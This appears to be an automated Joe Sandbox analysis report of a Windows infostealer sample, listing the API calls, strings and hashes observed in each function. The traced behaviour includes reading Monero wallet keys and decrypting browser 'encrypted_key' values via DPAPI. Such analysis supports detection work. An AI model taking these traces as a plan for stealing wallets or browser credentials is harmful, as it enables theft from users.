                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003E718C
                      • s>, xrefs: 003E72AE, 003E7179, 003E717C
                      Yara matches
                      Similarity
                      • API ID: lstrcpymemset
                      • String ID: s>$s>$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 4047604823-133744571
                      • Opcode ID: fd15c81c7e983ac0181c9368b194ee7c355d4f270654ea147a96f88eb0cd392c
                      • Instruction ID: a155d804cb58aa263b7c39cae2fe941a9a7090b8b2ec91e1bb8dbe6dc1b0b34e
                      • Opcode Fuzzy Hash: fd15c81c7e983ac0181c9368b194ee7c355d4f270654ea147a96f88eb0cd392c
                      • Instruction Fuzzy Hash: B15190B0C04269DBDB25EB91DC81BEEB374AF44304F1046A8E205772C2EB746E88CF55
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,0107C038,00000000,00020119,?), ref: 003E7E5E
                      • RegQueryValueExA.ADVAPI32(?,0108D700,00000000,00000000,000000FF,000000FF), ref: 003E7E7F
                      • RegCloseKey.ADVAPI32(?), ref: 003E7E92
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: a401a7aefe0ac1958e6f302849fcea6fa7c1245678fa5376fde910aa7fd0d9ab
                      • Instruction ID: 56a2595cbe0241b72ccd248a2f56edef0e74f46a0c6053514f44a03b69b08d3d
                      • Opcode Fuzzy Hash: a401a7aefe0ac1958e6f302849fcea6fa7c1245678fa5376fde910aa7fd0d9ab
                      • Instruction Fuzzy Hash: D2116AB1A44209EBDB11CBD5DD4AFBBBBB9EB44B10F10821AF605A7280D77459008BA1
                      APIs
                      • StrStrA.SHLWAPI(0108E028,?,?,?,003E140C,?,0108E028,00000000), ref: 003E926C
                      • lstrcpyn.KERNEL32(0061AB88,0108E028,0108E028,?,003E140C,?,0108E028), ref: 003E9290
                      • lstrlen.KERNEL32(?,?,003E140C,?,0108E028), ref: 003E92A7
                      • wsprintfA.USER32 ref: 003E92C7
                      Strings
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: 507e533625c76f505010cbdf58d02e5a2ebd7474054d54f95f4d3e6c6a826192
                      • Instruction ID: 600778c21dba4afbbddcd45acb045c02cf37d2d8de60d8c443c8b0095340f5d9
                      • Opcode Fuzzy Hash: 507e533625c76f505010cbdf58d02e5a2ebd7474054d54f95f4d3e6c6a826192
                      • Instruction Fuzzy Hash: CD011A7550514CFFCB05DFECD998EEE7BBAEB48350F188548F9098B241C631AA40DB91
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D12B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D12BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003D12D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003D12F5
                      • RegCloseKey.ADVAPI32(?), ref: 003D12FF
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: e43a2d61d4d49d4c15c8f42dfa34485584cde5aa8a4d5cd4f8d963db1bd5c03a
                      • Instruction ID: 624d941d90d3f16d8ca8083950249056967b664ed4669331ee0659065a695638
                      • Opcode Fuzzy Hash: e43a2d61d4d49d4c15c8f42dfa34485584cde5aa8a4d5cd4f8d963db1bd5c03a
                      • Instruction Fuzzy Hash: A801E1B9A40208BBDB04DFE4DC49FEEB7B9EB48701F14C15AFA0597280D6759A018F51
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 003E6663
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E6726
                      • ExitProcess.KERNEL32 ref: 003E6755
                      Strings
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: 1e2f70c9d600e7a352f251e61f071ba69127b109c740b3846cb7883750d1f9d5
                      • Instruction ID: a13e2dc564cb6073e5063b7d6d3031fdea9b6a21abfe3a4b3dd8de1ba653f8f2
                      • Opcode Fuzzy Hash: 1e2f70c9d600e7a352f251e61f071ba69127b109c740b3846cb7883750d1f9d5
                      • Instruction Fuzzy Hash: 27314FB1C01268ABDB16EB91DC81FDDB779AF04300F405299F2096A1D2DF746B49CF5A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003F0E28,00000000,?), ref: 003E882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E8836
                      • wsprintfA.USER32 ref: 003E8850
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Strings
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: deacd978e09322d41cafbefcbefa345d486ddb988474e8165e06e57186eb4e45
                      • Instruction ID: 56a6441477a1b0e152f06d659135d639272c65f55353ae4a5d6c13faaca4898e
                      • Opcode Fuzzy Hash: deacd978e09322d41cafbefcbefa345d486ddb988474e8165e06e57186eb4e45
                      • Instruction Fuzzy Hash: 18211DB1A41208ABDB04DFD8DD45FEEBBB9FB48711F148219F605A7280C779A901CBA1
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003E951E,00000000), ref: 003E8D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E8D62
                      • wsprintfW.USER32 ref: 003E8D78
                      Strings
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: ca77c9963b06cba46a6c3cbde508855099385d58d0570267fd7e663fed9361c6
                      • Instruction ID: 92bed7e17c6bac2d0c7629e4949215004895ee98948c0517e12da1989a2c8c19
                      • Opcode Fuzzy Hash: ca77c9963b06cba46a6c3cbde508855099385d58d0570267fd7e663fed9361c6
                      • Instruction Fuzzy Hash: 0EE08CB4A41208BBC700DBD8DC0AEA977B8EB04702F048195FE0A97280DA719E008B92
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DA2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 003DA3FF
                      • lstrlen.KERNEL32(00000000), ref: 003DA6BC
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 003DA743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: ea1eae23ea9949edb825b4c2cfa84280f94c6e4ad8e3d2a5385399409cb28ed4
                      • Instruction ID: 12e002d004274c314367aa83cafb7da0983db12efb0fdaa0df51e35918190ccc
                      • Opcode Fuzzy Hash: ea1eae23ea9949edb825b4c2cfa84280f94c6e4ad8e3d2a5385399409cb28ed4
                      • Instruction Fuzzy Hash: 47E134728105689BDB06FBA5DC92EEE7739AF14300F518259F1177A0D2EF307A09CB62
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DD481
                      • lstrlen.KERNEL32(00000000), ref: 003DD698
                      • lstrlen.KERNEL32(00000000), ref: 003DD6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 003DD72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 171657dc5307ad55c22eabff9238ada8d2e08a6542506193969c5ddc1cb7de75
                      • Instruction ID: c0d3215ff3c6592be28be3b618029331c35d7dab2c3ac74a1fe4ecd31411b175
                      • Opcode Fuzzy Hash: 171657dc5307ad55c22eabff9238ada8d2e08a6542506193969c5ddc1cb7de75
                      • Instruction Fuzzy Hash: 3A9157728105589BDB06FBA1DC92EEE7739AF14300F518269F5077A0D2EF347A09DB62
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DD801
                      • lstrlen.KERNEL32(00000000), ref: 003DD99F
                      • lstrlen.KERNEL32(00000000), ref: 003DD9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 003DDA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 950e65f6cd07f20e3b34f63c5b2db7ff7ef8cb58e01ebcb9defa2664d895fb3b
                      • Instruction ID: e60005e1982f9f2d38a405bfd546a087c137f34ddc165db4a54bdd4ecbb9a71d
                      • Opcode Fuzzy Hash: 950e65f6cd07f20e3b34f63c5b2db7ff7ef8cb58e01ebcb9defa2664d895fb3b
                      • Instruction Fuzzy Hash: EA8158728105589BDB06FBE1DC92EEE7739AF14300F414629F507AA0D2EF347A09DB62
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003F1580,003F0D92), ref: 003DF54C
                      • lstrlen.KERNEL32(00000000), ref: 003DF56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: f4aacaa9ac26fd37e1cd116857a20d4e4ff1e7e9531572c4c69abd78941035ef
                      • Instruction ID: 71b29bc006accdda5334c2d1f6a345a0c992a8e85ed5511579d2cbf388a17e90
                      • Opcode Fuzzy Hash: f4aacaa9ac26fd37e1cd116857a20d4e4ff1e7e9531572c4c69abd78941035ef
                      • Instruction Fuzzy Hash: 8E513172D00658AADB05FBA1EC92DED7779AF54300F418629F4066B1D1EF347A09CBA2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: e832eb58a3813b3ea20d541fe5566c42ec384652befca2c268eb36548b5b8d84
                      • Instruction ID: 7d7a4f9208b40373425c16f43088933e347c0dde01fe1b54f571ce434a22d5f9
                      • Opcode Fuzzy Hash: e832eb58a3813b3ea20d541fe5566c42ec384652befca2c268eb36548b5b8d84
                      • Instruction Fuzzy Hash: 7A416171D10258ABCB05EFF6C885AFEB778AF44304F008618E5167B2D1DB75AA05CFA2
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003D9D39
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9AEF
                        • Part of subcall function 003D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003D4EEE,00000000,?), ref: 003D9B01
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9B2A
                        • Part of subcall function 003D9AC0: LocalFree.KERNEL32(?,?,?,?,003D4EEE,00000000,?), ref: 003D9B3F
                        • Part of subcall function 003D9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003D9B84
                        • Part of subcall function 003D9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003D9BA3
                        • Part of subcall function 003D9B60: LocalFree.KERNEL32(?), ref: 003D9BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 0d99818ead7e98c5937be3d34884a4accb338d18cf5d3af8b3acb656f7d8bb26
                      • Instruction ID: 2eb85a44b66c647379e7ab7bd6e520ca6823d2f7ebdd7e694bc6b3b10007d351
                      • Opcode Fuzzy Hash: 0d99818ead7e98c5937be3d34884a4accb338d18cf5d3af8b3acb656f7d8bb26
                      • Instruction Fuzzy Hash: 57314FB6D1020DABCF05DFE4EC85BEEB7B9AF48304F14451AE905A7245EB349A04CBA1
                      APIs
                      • memset.MSVCRT ref: 003E94EB
                        • Part of subcall function 003E8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003E951E,00000000), ref: 003E8D5B
                        • Part of subcall function 003E8D50: RtlAllocateHeap.NTDLL(00000000), ref: 003E8D62
                        • Part of subcall function 003E8D50: wsprintfW.USER32 ref: 003E8D78
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 003E95AB
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 003E95C9
                      • CloseHandle.KERNEL32(00000000), ref: 003E95D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
